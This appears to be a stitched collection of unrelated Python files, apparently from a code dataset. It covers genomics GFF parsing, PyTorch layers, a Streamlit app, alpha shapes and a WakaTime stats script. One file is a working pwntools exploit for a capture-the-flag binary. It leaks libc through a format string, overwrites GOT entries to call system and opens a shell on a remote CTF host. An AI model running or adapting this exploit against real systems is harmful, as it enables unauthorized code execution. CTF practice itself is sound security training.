c. solve columns error of gff.
------------------------------------------------------------------------------------------
"""
__author__ = "Frank"
__version__ = "0.4.3"
import sys
import os
import gzip
import re
import numpy as np  # needed by calculateDist below
from Bio.Seq import Seq
from Bio import SeqIO
from Bio.Alphabet import IUPAC
from Bio.Alphabet import generic_dna
from collections import OrderedDict
from optparse import OptionParser
def readfile(filein,mode):
try:
if filein.endswith('gz'):
fx = gzip.open(filein,mode+'b')
else:
            fx = open(filein, mode)
except:
        sys.stderr.write('ERROR: failed to open file: %s!\n' % filein)
return fx
def calculateDist(listx):
dists = []
for i in xrange(len(listx)):
pos1 = int(listx[i].split('_')[0])
pos2 = int(listx[i].split('_')[1])
dist = pos2-pos1+1
dists.append(dist)
sumx = float(np.sum(dists))
return sumx
def gffAttr(idx,key_len=3,sep=';'):
if sep in idx:
out = idx.split(sep)[0][key_len:]
else:
out = idx[key_len:]
return out
def reParentAttr(line):
if 'Parent=' in line:
parent = re.search(r'Parent=\S+;?',line).group()
par_info = gffAttr(parent,key_len=7)
else:
par_info = reIDAttr(line)
return par_info
def reIDAttr(line):
idx = re.search(r'ID=\S+;?',line).group()
id_info = gffAttr(idx)
return id_info
def reIDAttr2(line):
idx = re.search(r'ID=\S+;?',line)
if idx == None:
print line
id_info = None
else:
idx = idx.group()
id_info = gffAttr(idx)
return id_info
def reNameAttr(line):
name = re.search(r'Name=\S+;?',line).group()
name_info = gffAttr(name,key_len=5)
return name_info
def outgffAttr(info,line,split_sym=';'):
linetype = info.split('/')[1]
if linetype == 'gene':
geneid = reIDAttr(line)
geneid2 = outgene(geneid)
line = '\t'.join(line.strip().split('\t')[0:-1])+'\tID='+geneid2+';\n'
#elif linetype == 'mRNA' or linetype == 'CDS':
else:
mRNAparid = reParentAttr(line)
mRNAparid2 = outgene(mRNAparid)
if 'ID=' in line:
mRNAid = reIDAttr(line)
mRNAid2 = outgene(mRNAid)
line = '\t'.join(line.strip().split('\t')[0:-1])+'\tID='+mRNAid2+';Parent='+mRNAparid2+';\n'
else:
line = '\t'.join(line.strip().split('\t')[0:-1])+'\tID='+mRNAparid2+';Parent='+mRNAparid2+';\n'
return line
def sortedDict(hgff):
for gene in hgff:
if len(hgff[gene]) == 0:
del hgff[gene]
continue
distcal = {}
for x in hgff[gene]:
distx = calculateDist(hgff[gene][x])
distcal[x] = distx
sorted_dist = sorted(distcal.items(), key = lambda d:d[1],reverse=True)
sorted_key = sorted_dist[0][0]
strand = gene.split('/')[-1]
if strand == '+':
sorted_value = sorted(hgff[gene][sorted_key],key=lambda x:int(x.split('_')[0]))
else:
sorted_value = sorted(hgff[gene][sorted_key],key=lambda x:int(x.split('_')[0]),reverse=True)
hgff[gene] = {sorted_key:sorted_value}
return hgff
def outgff(hgff,hgeneinfo,hinfo,split_sym='_'):
houtinfo = OrderedDict()
for gene in hgff:
if gene in hgeneinfo:
chrx = hgeneinfo[gene].split('/')[0]
geneinfox = chrx+'/'+'gene'+'/'+gene
houtinfo[geneinfox] = hinfo[geneinfox]
for x in hgff[gene]:
rnainfox = chrx+'/'+'mRNA'+'/'+x
houtinfo[rnainfox] = hinfo[rnainfox]
for i in xrange(len(hgff[gene][x])):
cdsinfox = chrx+'/CDS/'+split_sym.join(hgff[gene][x][i].split(split_sym)[0:-1])+'/'+x
houtinfo[cdsinfox] = hinfo[cdsinfox]
else:
continue
return houtinfo
def outseq_trans_strand(seq,strand_dir):
if strand_dir == '-':
seqout = ''.join(list(Seq(seq, IUPAC.unambiguous_dna).reverse_complement())).upper()
else:
seqout = seq.upper()
return seqout
def outgene(gene): # update 2020.01.08
#if ':' in gene:
# geneout = gene.split(':')[-1]
#else:
# geneout = gene
gene = gene.split(':')[-1]
geneout = re.sub('[^.\w+]','_',gene)
return geneout
def longestmRNA(fgff,gene_region='CDS'):
hgff = OrderedDict()
hmRNA_gene = {}
hgeneinfo = {} #{geneid1:'chr1/+',geneid2:'chr1/-'}
hinfo = {} #{'chr1/gene/geneid':line,'chr1/mRNA/rna_id':line'}
for line in fgff:
if line.startswith('#'):continue
if len(line.strip()) == 0:continue
gffline = line.strip().split('\t')
geneinfo = gffline[0]+'/'+gffline[6]
        if gffline[2] == 'gene':  # only works if all gene lines carry a biotype attribute, or none do
if 'biotype=protein_coding' in gffline[8]:
geneid = reIDAttr(gffline[8])+'/'+gffline[6]
hgff.setdefault(geneid,{})
hgeneinfo[geneid] = geneinfo
geneinfox = gffline[0]+'/'+'gene'+'/'+geneid
hinfo[geneinfox] = line
elif 'biotype=' not in gffline[8]:
geneid = reIDAttr(gffline[8])+'/'+gffline[6]
hgff.setdefault(geneid,{})
hgeneinfo[geneid] = geneinfo
geneinfox = gffline[0]+'/'+'gene'+'/'+geneid
hinfo[geneinfox] = line
else:
continue
else:
if gffline[2] == 'mRNA' or gffline[2] == 'transcript':
rna_parent = reParentAttr(gffline[8])+'/'+gffline[6]
rna_id = reIDAttr(gffline[8])
hmRNA_gene[rna_id] = rna_parent
if rna_parent in hgff:
hgff[rna_parent][rna_id] = []
else:
continue
rnainfox = gffline[0]+'/'+'mRNA'+'/'+rna_id
hinfo[rnainfox] = line
elif gffline[2] == gene_region:
cds_parent = reParentAttr(gffline[8])
posinfo = gffline[3]+'_'+gffline[4]+'_'+gffline[7]
if cds_parent in hmRNA_gene:
genex = hmRNA_gene[cds_parent]
if genex in hgff:
hgff[genex][cds_parent].append(posinfo)
else:
continue
else:
continue
cdsinfox = gffline[0]+'/CDS/'+gffline[3]+'_'+gffline[4]+'/'+cds_parent
hinfo[cdsinfox] = line
else:
continue
hgff = sortedDict(hgff)
houtinfo = outgff(hgff,hgeneinfo,hinfo,split_sym='_')
del hinfo
return hgff,hgeneinfo,houtinfo
#def outfa_parse(hout,hgeneinfo,fasta,fa_out,sp_abbr="None",outseqname_type="gene"):
def outfa_parse(hout,hgeneinfo,fasta,fa_out,fp_out,sp_abbr="None",outseqname_type="gene",table=1,cds_fetch_position='True'):
for seq in SeqIO.parse(fasta,"fasta"):
for gene in hout:
if len(hout[gene]) == 0:continue
if gene in hgeneinfo:
chrom = hgeneinfo[gene].split('/')[0]
sym = hgeneinfo[gene].split('/')[-1]
seqouts = []
if chrom == seq.id:
for x in hout[gene]:
phase_list = []
for i in xrange(len(hout[gene][x])):
pos1 = int(hout[gene][x][i].split('_')[0])
pos2 = int(hout[gene][x][i].split('_')[1])
seqout = str(seq.seq)[pos1-1:pos2]
seqouts.append(seqout)
phase_list.append(hout[gene][x][i].split('_')[-1])
del hout[gene]
#del hgeneinfo[gene]
if sym == '+':
outseqs = ''.join(seqouts)
else:
outseqs = ''.join(seqouts[::-1])
seq_ret = outseq_trans_strand(outseqs,sym)
phase = phase_list[0]
if phase == '.':
seq_retx = seq_ret
else:
seq_retx = seq_ret[int(phase):]
gene = outgene(gene.split('/')[0])
x = outgene(x)
if outseqname_type == "gene":
if sp_abbr == "None":
if cds_fetch_position == 'True':
fa_out.write('>'+gene+'\n'+seq_ret+'\n')
else:
fa_out.write('>'+gene+'\n'+seq_retx+'\n')
fp_out.write('>'+gene+'\n'+str(Seq(seq_retx).translate(table=table))+'\n')
else:
if cds_fetch_position == 'True':
fa_out.write('>'+gene+'_'+sp_abbr+'\n'+seq_ret+'\n')
else:
fa_out.write('>'+gene+'_'+sp_abbr+'\n'+seq_retx+'\n')
fp_out.write('>'+gene+'_'+sp_abbr+'\n'+str(Seq(seq_retx).translate(table=table))+'\n')
elif outseqname_type == "mRNA":
if sp_abbr == "None":
if cds_fetch_position == 'True':
fa_out.write('>'+x+'\n'+seq_ret+'\n')
else:
fa_out.write('>'+x+'\n'+seq_retx+'\n')
fp_out.write('>'+x+'\n'+str(Seq(seq_retx).translate(table=table))+'\n')
else:
if cds_fetch_position == 'True':
fa_out.write('>'+x+'_'+sp_abbr+'\n'+seq_ret+'\n')
else:
fa_out.write('>'+x+'_'+sp_abbr+'\n'+seq_retx+'\n')
fp_out.write('>'+x+'_'+sp_abbr+'\n'+str(Seq(seq_retx).translate(table=table))+'\n')
else:
sys.stderr.write('[ERROR] Something wrong with the -t option, please check it.')
else:
continue
else:
continue
def main():
usage="%prog [options]" + '\n' + __doc__ + "\n"
parser = OptionParser(usage,version="%prog " + __version__)
parser.add_option('-i',"--input-gff",action="store",type="string",dest="input_gff",help="Annotation file in gff format. [required]")
parser.add_option('-f',"--input-fasta",action="store",type="string",dest="input_fasta",help="genome file in fasta format. [required]")
parser.add_option('-g',"--out-gff",action="store",type="string",dest="output_gff",help="output files(s) in gff format with longest mRNA. [required]")
parser.add_option('-o',"--out-fa-prefix",action="store",type="string",dest="output_fasta",help="prefix of output files(s) in fasta format. [required]")
parser.add_option('-s',"--species-shortname",action="store",type="string",dest="species_shortname",help="add species shortname in sequence name",default="None")
parser.add_option('-r',"--region",action="store",dest="gene_region",help="the region of genes, you can choose 'CDS' or 'exon'",type="choice",choices=["CDS","exon"],default="CDS")
parser.add_option('-t',"--type",action="store",dest="outseqname_type",help="type of out sequence name,you can choose 'gene' or 'mRNA'",type="choice",choices=["gene","mRNA"],default="mRNA")
parser.add_option('-l',"--length",action="store",dest="pep_length",help="the filtered length of protein sequence",type="int",default=30)
parser.add_option('--tt',action='store',dest="transl_table",help="codon table used for translating CDS sequence, you can learn more from the link: http://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi",type="int",default=1)
parser.add_option('--cfp',action='store',dest='cds_fetch_position',help='CDS sequences extracted by position or not, True or False, default="False"',type='choice',choices=["True","False"],default="False")
(options,args)=parser.parse_args()
if not (options.input_fasta and options.input_gff):
parser.print_help()
sys.exit(0)
with readfile(options.input_gff,'r') as fgff:
hout,hgeneinfo,houtinfo = longestmRNA(fgff,gene_region=options.gene_region)
with readfile(options.output_gff,'w') as fgff_out:
for outinfo in houtinfo:
fgff_out.write(outgffAttr(outinfo,houtinfo[outinfo]))
with readfile(options.input_fasta,'r') as fasta, readfile(options.output_fasta+'.cds','w') as fa_out, readfile(options.output_fasta+'.pep','w') as fp_out:
outfa_parse(hout,hgeneinfo,fasta,fa_out,fp_out,sp_abbr=options.species_shortname,outseqname_type=options.outseqname_type,table=options.transl_table,cds_fetch_position=options.cds_fetch_position)
os.system('python pep_cds_filter.py %s %s %s'%(os.path.abspath(options.output_fasta+'.pep'),os.path.abspath(options.output_fasta+'.cds'),str(options.pep_length)))
if __name__ == "__main__":
main()
| nilq/baby-python | python |
import httpx
group_types = ("group", "supergroup")
http = httpx.AsyncClient(http2=True)
class Permissions:
can_be_edited = "can_be_edited"
delete_messages = "can_delete_messages"
restrict_members = "can_restrict_members"
promote_members = "can_promote_members"
change_info = "can_change_info"
invite_users = "can_invite_users"
pin_messages = "can_pin_messages"
| nilq/baby-python | python |
#!/usr/bin/python3
from pwn import *
binary = ELF('./dead-canary')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.update(arch='amd64',os='linux')
binary.symbols['main'] = 0x400737
offset = 6
libcoffset = 41
#p = process(binary.path)
p = remote('2020.redpwnc.tf', 31744)
# first pass, inf. retries if we blow out canary, leak libc
p.recvuntil('name: ')
payload = b'%' + str(libcoffset).encode().rjust(2,b'0') + b'$018p'
payload += fmtstr_payload(offset+1,{binary.got['__stack_chk_fail']:binary.symbols['main']},numbwritten=18)
payload += ((0x118 - 0x10 + 1) - len(payload)) * b'A'
p.send(payload)
p.recvuntil('Hello ')
_ = p.recv(18)
__libc_start_main = int(_,16) - 231
log.info('__libc_start_main: ' + hex(__libc_start_main))
baselibc = __libc_start_main - libc.symbols['__libc_start_main']
log.info('baselibc: ' + hex(baselibc))
libc.address = baselibc
# 2nd pass, printf -> system
p.recvuntil('name: ')
payload = fmtstr_payload(offset,{binary.got['printf']:libc.symbols['system']},numbwritten=0)
payload += ((0x118 - 0x10 + 1) - len(payload)) * b'A'
p.send(payload)
# take out the garbage
null = payload.find(b'\x00')
log.info('null loc: ' + str(null))
p.recvuntil(payload[null-2:null])
# final pass, flying blind
p.sendline('/bin/sh')
p.interactive()
| nilq/baby-python | python |
"""
Typcasting w. Integers & Floats
"""
# Convert these numbers into floats and back. Print out each result as well as its data type.
five = 5
zero = 0
neg_8 = -8
neg_22 = -22
five = float(five)
zero = float(zero)
neg_8 = float(neg_8)
neg_22 = float(neg_22)
print(five, type(five)) # 5.0 <class 'float'>
print(zero, type(zero)) # 0.0 <class 'float'>
print(neg_8, type(neg_8)) # -8.0 <class 'float'>
print(neg_22, type(neg_22)) # -22.0 <class 'float'>
five = int(five)
zero = int(zero)
neg_8 = int(neg_8)
neg_22 = int(neg_22)
print(five, type(five)) # 5 <class 'int'>
print(zero, type(zero)) # 0 <class 'int'>
print(neg_8, type(neg_8)) # -8 <class 'int'>
print(neg_22, type(neg_22)) # -22 <class 'int'>
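# A brief addition for illustration (not part of the original exercise):
# int() truncates toward zero rather than rounding.
print(int(2.9), int(-2.9))      # 2 -2 (truncation toward zero)
print(round(2.9), round(-2.9))  # 3 -3 (rounding to the nearest integer)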
| nilq/baby-python | python |
from io import StringIO
import json
import streamlit as st
from water_rocket import WaterRocket
def page_introduction(wr: WaterRocket) -> WaterRocket:
st.title("Open Water Rocket")
st.write("""
## Objectives
    The goal of this app is to provide a simple platform for analysing
    water rocket designs.
"""
)
st.warning("This is only a VERY initial prototype!")
st.write("""
---
## Load data
You can load a .json file with your project data,
or you may configure it in the tabs in the sidebar.
"""
)
data = st.file_uploader(
label="Upload json file",
type="json",
accept_multiple_files=False,
)
if data:
st.write("""
---
## Loaded Data
Data loaded successfully.
"""
)
data_str = StringIO(data.getvalue().decode("utf-8")).read()
data_json = json.loads(data_str)
st.json(data_json)
wr = WaterRocket(**data_json)
return wr
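# A minimal sketch (added for illustration, not in the original module): the
# uploaded file is decoded and parsed exactly as in page_introduction above,
# and the resulting keys are passed to WaterRocket as keyword arguments.
def _parse_upload(raw_bytes: bytes) -> dict:
    """Decode an uploaded .json payload the same way page_introduction does."""
    return json.loads(StringIO(raw_bytes.decode("utf-8")).read())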
| nilq/baby-python | python |
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
class SurfaceClassifier(nn.Module):
def __init__(self, filter_channels, num_views=1, no_residual=True, last_op=None):
super(SurfaceClassifier, self).__init__()
self.filters = []
self.num_views = num_views
self.no_residual = no_residual
filter_channels = filter_channels
self.last_op = last_op
if self.no_residual:
for l in range(0, len(filter_channels) - 1):
self.filters.append(nn.Conv1d(
filter_channels[l],
filter_channels[l + 1],
1))
self.add_module("conv%d" % l, self.filters[l])
else:
for l in range(0, len(filter_channels) - 1):
if 0 != l:
self.filters.append(
nn.Conv1d(
filter_channels[l] + filter_channels[0],
filter_channels[l + 1],
1))
else:
self.filters.append(nn.Conv1d(
filter_channels[l],
filter_channels[l + 1],
1))
self.add_module("conv%d" % l, self.filters[l])
def forward(self, feature):
'''
        :param feature: [B x C_in x N] tensor of per-point image features
        :return: [B x C_out x N] tensor of predictions at the sampled points
'''
y = feature
tmpy = feature
for i, f in enumerate(self.filters):
if self.no_residual:
y = self._modules['conv' + str(i)](y)
else:
y = self._modules['conv' + str(i)](
y if i == 0
else torch.cat([y, tmpy], 1)
)
if i != len(self.filters) - 1:
y = F.leaky_relu(y)
if self.num_views > 1 and i == len(self.filters) // 2:
y = y.view(
-1, self.num_views, y.shape[1], y.shape[2]
).mean(dim=1)
tmpy = feature.view(
-1, self.num_views, feature.shape[1], feature.shape[2]
).mean(dim=1)
if self.last_op:
y = self.last_op(y)
return y
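# A minimal usage sketch (added for illustration; the channel sizes and batch
# shape below are assumptions, not values mandated by this module): the MLP
# consumes per-point feature vectors and emits one prediction per point.
def _surface_classifier_demo():
    clf = SurfaceClassifier(filter_channels=[257, 512, 256, 128, 1],
                            last_op=nn.Sigmoid())
    feat = torch.rand(2, 257, 5000)   # [B x C_in x N] per-point features
    out = clf(feat)                   # [B x 1 x N], squashed into (0, 1)
    return out.shape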
class neural_texture(nn.Module):
def __init__(self, filter_channels, num_views=1, no_residual=True, last_op=None):
super(neural_texture, self).__init__()
self.filters = []
self.num_views = num_views
self.no_residual = no_residual
filter_channels = filter_channels
self.last_op = last_op
if self.no_residual:
for l in range(0, len(filter_channels) - 1):
self.filters.append(nn.Conv1d(
filter_channels[l],
filter_channels[l + 1],
1))
self.add_module("conv%d" % l, self.filters[l])
else:
for l in range(0, len(filter_channels) - 1):
if 0 != l:
self.filters.append(
nn.Conv1d(
filter_channels[l] + filter_channels[0],
filter_channels[l + 1],
1))
else:
self.filters.append(nn.Conv1d(
filter_channels[l],
filter_channels[l + 1],
1))
self.add_module("conv%d" % l, self.filters[l])
def forward(self, feature):
'''
        :param feature: [B x C_in x N] tensor of per-point features
        :return: [B x C_out x N] tensor of outputs for each point
'''
y = feature
tmpy = feature
for i, f in enumerate(self.filters):
if self.no_residual:
y = self._modules['conv' + str(i)](y)
else:
y = self._modules['conv' + str(i)](
y if i == 0
else torch.cat([y, tmpy], 1)
)
if i != len(self.filters) - 1:
y = F.leaky_relu(y)
if self.num_views > 1 and i == len(self.filters) // 2:
y = y.view(
-1, self.num_views, y.shape[1], y.shape[2]
).mean(dim=1)
tmpy = feature.view(
-1, self.num_views, feature.shape[1], feature.shape[2]
).mean(dim=1)
if self.last_op:
y = self.last_op(y)
return y
class conv1_1(nn.Module):
def __init__(self, input_layers=256, output_layers=16, kernel_size=1, stride=1, padding=0, bias=True):
super(conv1_1, self).__init__()
self.model = nn.Conv2d(in_channels=input_layers, out_channels=output_layers, \
kernel_size=kernel_size, stride=stride, padding=padding, bias=bias)
self.sig = nn.Sigmoid()
def forward(self, x):
x = self.model(x)
x = self.sig(x)
return x*2-1
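# A small usage sketch (added for illustration; the sizes are arbitrary):
# conv1_1 is a 1x1 projection whose sigmoid output is rescaled to (-1, 1).
def _conv1_1_demo():
    proj = conv1_1(input_layers=256, output_layers=16)
    tex = proj(torch.rand(1, 256, 128, 128))  # values in (-1, 1)
    return tex.shape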
# class contrast_loss(nn.Module):
# # TODO: use precomputed face index map to only supervise the fore part.
# def __init__(self,rate=1) -> None:
# super(contrast_loss,self).__init__()
# self.temp1 = 100.
# self.temp2 = 10.
# self.criterion=nn.MSELoss()
# self.fake = torch.zeros((16,128,128)).to('cuda:0')
# self.rate = rate
# def forward(self, src, tgt):
# if isinstance(src, np.ndarray):
# src = torch.from_numpy(src)
# if isinstance(tgt, np.ndarray):
# tgt = torch.from_numpy(tgt)
# self.consist_loss = self.criterion(src,tgt)*self.temp1
# # print(self.consist_loss)
# if self.temp2 > 0:
# self.temp2-=self.rate
# self.differ_loss = -torch.log(self.criterion(src,self.fake.expand(src.shape[0],-1,-1,-1)))*self.temp2
# return self.differ_loss+self.consist_loss
# else:
# return self.consist_loss
class period_loss(nn.Module):
def __init__(self,r1=10,r2=1,r3=0.1,r4=0.01) -> None:
super(period_loss,self).__init__()
self.weights = [r1, r2, r3, r4]
# self.slice = [4,8,12,16]
self.criterion = nn.MSELoss()
def forward(self,x,y):
if x.shape[1]==16:
loss = 0.0
for i in range(4):
loss+=self.weights[i] * self.criterion(x[:,4*i:4*i+4], y[:,4*i:4*i+4])
return loss/4
        if x.shape[1]==3:
            return self.criterion(x, y)
        # fall back to plain MSE for any other channel count (the original
        # implicitly returned None here, which would break loss computation)
        return self.criterion(x, y)
if __name__=='__main__':
a = torch.rand((4,16,128,128))*2-1
b = torch.rand((4,16,128,128))*2-1
c = torch.ones((4,16,128,128))
d = torch.zeros((4,16,128,128))
ppp = period_loss(1,1,1,1)
f = ppp(c,d)
print(f) | nilq/baby-python | python |
class PushwooshException(Exception):
pass
class PushwooshCommandException(PushwooshException):
pass
class PushwooshNotificationException(PushwooshException):
pass
class PushwooshFilterException(PushwooshException):
pass
class PushwooshFilterInvalidOperatorException(PushwooshFilterException):
pass
class PushwooshFilterInvalidOperandException(PushwooshFilterException):
pass
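# A brief usage sketch (added for illustration): the hierarchy lets callers
# catch a specific failure or any Pushwoosh error via the base class.
def _classify(exc: Exception) -> str:
    try:
        raise exc
    except PushwooshFilterException:
        return "filter error"
    except PushwooshException:
        return "other pushwoosh error"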
| nilq/baby-python | python |
import socket
from smtplib import SMTPException
from django.core.mail import EmailMessage
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
def send_email(instance):
context = {
"user": instance,
"api_key": instance.client.api_key,
}
email_subject = _(f"API Token Created")
email_body = render_to_string("core\email_message.txt", context)
emailBody = EmailMessage(
subject=email_subject,
body=email_body,
from_email="[email protected]",
to=(instance.email,),
cc="",
reply_to=("[email protected]",),
)
try:
emailBody.send(fail_silently=False)
print("token email sent")
# error due to email server
except SMTPException as e:
print(f"email failed due to {e}")
# error due to socket
except socket.gaierror as e:
print(f"email failed due to {e}")
| nilq/baby-python | python |
import numpy as np
from scipy.spatial import Delaunay
import matplotlib.pyplot as plt
from matplotlib.collections import LineCollection
class AlphaVisualization:
""" Visualization methods for AlphaShapes class. """
def plot_boundary(self, color='k', ax=None, **kwargs):
"""
Plot boundary of concave hull as a collection of line objects.
Args:
color (str or RGBA) - path color
ax (matplotlib.axes.AxesSubplot) - if None, create figure
kwargs: keyword arguments for matplotlib.LineCollection
"""
# create figure
if ax is None:
fig, ax = plt.subplots(figsize=(2, 2))
xmin, ymin = self.points.min(axis=0)
xmax, ymax = self.points.max(axis=0)
ax.set_xlim(xmin, xmax)
ax.set_ylim(ymin, ymax)
ax.axis('off')
# create line collection and add it to the axis
lines = LineCollection(self.boundary, colors=color, **kwargs)
ax.add_collection(lines)
# format axis
ax.set_aspect(1)
return ax
class AlphaShapes(AlphaVisualization):
"""
Object for computing the concave hull (alpha shape) of a set of points.
Attributes:
points (np.ndarray[float]) - points, shape (n,2)
alpha (float) - alpha value
only_outer (bool) - if True, only keep outer border
edge_indices (np.ndarray[int]) - (i,j) pairs representing edges of the alpha-shape. Indices (i,j) index the points array.
References:
stackoverflow: questions/50549128/boundary-enclosing-a-given-set-of-points
"""
def __init__(self, points, alpha, only_outer=True):
"""
Instantiate alpha shape object.
Args:
points (np.ndarray[float]) - points, shape (n,2)
alpha (float) - alpha value
only_outer (bool) - if True, only keep outer border
"""
self.points = points
self.alpha = alpha
self.only_outer = only_outer
edge_indices = self._alpha_shape(points, alpha, only_outer=only_outer)
self.edge_indices = np.array(list(edge_indices))
def __call__(self, xy):
""" Test whether each point in <xy> lies within the alpha shape. """
        f = np.vectorize(lambda x, y: self._is_inside(x, y, self.points, self.edge_indices))
        return f(*xy.T)
@property
def boundary(self):
""" Boundary line segments. """
return self.points[self.edge_indices]
@staticmethod
def _alpha_shape(points, alpha, only_outer=True):
"""
Compute the concave hull (alpha shape) of a set of points.
Args:
points (np.ndarray[float]) - points, shape (n,2)
alpha (float) - alpha value
only_outer (bool) - if True, only keep outer border
Returns:
            edges (set of tuples) - Set of (i,j) pairs representing edges of the alpha-shape. Indices (i,j) index the points array.
References:
https://stackoverflow.com/questions/50549128/boundary-enclosing-a-given-set-of-points
"""
assert points.shape[0] > 3, "Need at least four points"
def add_edge(edges, i, j):
""" Add a line between the i-th and j-th points if it's not already in the list. """
if (i, j) in edges or (j, i) in edges:
# already added
                assert (j, i) in edges, "Can't go twice over the same directed edge"
if only_outer:
# if both neighboring triangles are in shape, it's not a boundary edge
edges.remove((j, i))
return
edges.add((i, j))
tri = Delaunay(points)
edges = set()
# Loop over triangles:
# ia, ib, ic = indices of corner points of the triangle
        for ia, ib, ic in tri.simplices:
pa = points[ia]
pb = points[ib]
pc = points[ic]
# Computing radius of triangle circumcircle
# www.mathalino.com/reviewer/derivation-of-formulas/derivation-of-formula-for-radius-of-circumcircle
a = np.sqrt((pa[0] - pb[0]) ** 2 + (pa[1] - pb[1]) ** 2)
b = np.sqrt((pb[0] - pc[0]) ** 2 + (pb[1] - pc[1]) ** 2)
c = np.sqrt((pc[0] - pa[0]) ** 2 + (pc[1] - pa[1]) ** 2)
s = (a + b + c) / 2.0
area = np.sqrt(s * (s - a) * (s - b) * (s - c))
circum_r = a * b * c / (4.0 * area)
if circum_r < alpha:
add_edge(edges, ia, ib)
add_edge(edges, ib, ic)
add_edge(edges, ic, ia)
return edges
@staticmethod
def _is_inside(x, y, points, edges, eps=1.0e-10):
"""
Check if point (<x>, <y>) lies within the alpha shape defined by <points> and <edges>.
"""
intersection_counter = 0
for i, j in edges:
assert abs((points[i,1]-y)*(points[j,1]-y)) > eps, 'Need to handle these end cases separately'
y_in_edge_domain = ((points[i,1]-y)*(points[j,1]-y) < 0)
if y_in_edge_domain:
upper_ind, lower_ind = (i,j) if (points[i,1]-y) > 0 else (j,i)
upper_x = points[upper_ind, 0]
upper_y = points[upper_ind, 1]
lower_x = points[lower_ind, 0]
lower_y = points[lower_ind, 1]
# is_left_turn predicate is evaluated with: sign(cross_product(upper-lower, p-lower))
cross_prod = (upper_x - lower_x)*(y-lower_y) - (upper_y - lower_y)*(x-lower_x)
assert abs(cross_prod) > eps, 'Need to handle these end cases separately'
point_is_left_of_segment = (cross_prod > 0.0)
if point_is_left_of_segment:
intersection_counter = intersection_counter + 1
return (intersection_counter % 2) != 0
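# A minimal usage sketch (added for illustration; the point cloud and alpha
# value are arbitrary): compute the alpha shape of a noisy ring of points and
# draw its boundary.
def _alpha_shape_demo():
    theta = np.random.uniform(0, 2 * np.pi, 500)
    radius = np.random.uniform(0.8, 1.0, 500)
    points = np.column_stack([radius * np.cos(theta), radius * np.sin(theta)])
    shape = AlphaShapes(points, alpha=0.25)
    ax = shape.plot_boundary(color='k', linewidths=1)
    plt.show()
    return ax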
| nilq/baby-python | python |
import os.path
import argparse
import json
import yaml
from datetime import datetime
import numpy as np
import plotly.graph_objects as go
import plotly.express as px
import ctypes
import PySimpleGUI as sg
class Stats:
    '''Base class that holds the dates, plus a method for converting them to the proper type and a method for converting seconds to hours.'''
days = []
@classmethod
def convert_dates(cls, days=days):
        '''Converts the date strings into proper date objects.'''
for index, day in enumerate(days):
days[index] = datetime(int(day[0:4]), int(day[5:7]), int(day[8:10])).date()
@staticmethod
def seconds_to_hours(seconds):
        '''Converts the given number of seconds to hours.'''
hours = seconds / 3600
return hours
@staticmethod
def fetch_days_and_labels(data, days=days, languages=None, editors=None, operating_systems=None, ignored_stats=[], searched_stats=[]):
        '''Adds the days to the list and the keys to the requested lookup structures.'''
        #Go through all days
        for day in data["days"]:
            #Skip the day depending on the user-given arguments
if day["date"] < str(start_date):
continue
elif day["date"] > str(end_date):
continue
            #Dates
days.append(day["date"])
            #Languages
if languages is not None:
for language in day["languages"]:
if len(searched_stats) == 0:
if language["name"] in ignored_stats:
continue
elif language["name"] not in languages:
languages[language["name"]] = []
else:
if language["name"] not in searched_stats:
continue
elif language["name"] not in languages:
languages[language["name"]] = []
            #Editors
if editors is not None:
for editor in day["editors"]:
if len(searched_stats) == 0:
if editor["name"] in ignored_stats:
continue
elif editor["name"] not in editors:
editors[editor["name"]] = []
else:
if editor["name"] not in searched_stats:
continue
elif editor["name"] not in editors:
editors[editor["name"]] = []
            #Operating systems
if operating_systems is not None:
for operating_system in day["operating_systems"]:
if len(searched_stats) == 0:
if operating_system["name"] in ignored_stats:
continue
elif operating_system["name"] not in operating_systems:
operating_systems[operating_system["name"]] = []
else:
if operating_system["name"] not in searched_stats:
continue
elif operating_system["name"] not in operating_systems:
operating_systems[operating_system["name"]] = []
class LanguagesStats(Stats):
    '''Subclass that holds the stats for the different programming languages.'''
def __init__(self):
self.languages = {}
self.keys = []
self.total_times = []
def populate_stats(self, data):
        '''Adds the language stats to the lookup structure.
        Parameters:
        data -- The data read from the JSON file.
        '''
        #How many days' worth of stats have been added to the languages
number_of_days = 0
        #Go through all days
        for day in data["days"]:
            #Skip the day depending on the user-given arguments
if day["date"] < str(start_date):
continue
elif day["date"] > str(end_date):
continue
number_of_days += 1
            #If the day has no language stats
            if len(day["languages"]) == 0:
                #Add zero hours for that day to every programming language
                for language in self.languages:
                    self.languages[language].append(0.0)
            #If the day has language stats
            else:
                #Go through all languages
                for language in day["languages"]:
                    #Skip the language if the user wants to
                    if len(searched_stats) == 0:
                        if language["name"] in ignored_stats:
                            continue
                    else:
                        if language["name"] not in searched_stats:
                            continue
                    #Add that day's stats to the language, converted to hours
                    self.languages[language["name"]].append(Stats.seconds_to_hours(language["total_seconds"]))
        #Go through all languages
        for language in self.languages:
            #If a day is missing from the language's stats, add zero hours for that day
if len(self.languages[language]) < number_of_days:
self.languages[language].append(0.0)
def sort_stats_and_populate_keys(self):
        '''Sorts the stats from most used to least used and fills the keys in the corresponding order.'''
total_hours = 0
        #Go through the languages
        for language in self.languages:
            #Sum up the language's daily times
            hours = sum(self.languages[language])
            #Add the time to the total time
            total_hours += hours
            #Add the total time and the key to the lists
            self.total_times.append(hours)
            self.keys.append(language)
        if minimum_labeling_percentage != 0.0:
            self.unify_stats()
        #Reorder from most used to least used; the lists become tuples
        self.total_times, self.keys = zip(*sorted(zip(self.total_times, self.keys), reverse=True))
def unify_stats(self):
        '''Merges stats under the label Other according to the given threshold.'''
        removed_at_indexes = []
        #Add the label Other if needed
        if "Other" not in self.keys:
            self.keys.append("Other")
            self.total_times.append(0.0)
            self.languages["Other"] = [0.0 for value in self.languages[self.keys[0]]]
        #Add the shares that fall below the threshold to Other
        for index, total_time in enumerate(self.total_times):
            if self.keys[index] == "Other":
                continue
            elif total_time / sum(self.total_times) * 100.0 < minimum_labeling_percentage:
                self.languages["Other"] = np.add(self.languages["Other"], self.languages[self.keys[index]]).tolist()
                self.total_times[self.keys.index("Other")] += self.total_times[index]
                removed_at_indexes.append(index)
        #Remove the Other label and its stats if it is unnecessary, and exit the method
        if len(removed_at_indexes) == 0:
            del(self.total_times[self.keys.index("Other")])
            del(self.languages["Other"])
            self.keys.remove("Other")
            return
        #Remove the daily stats, labels, and total times of the stats merged into Other
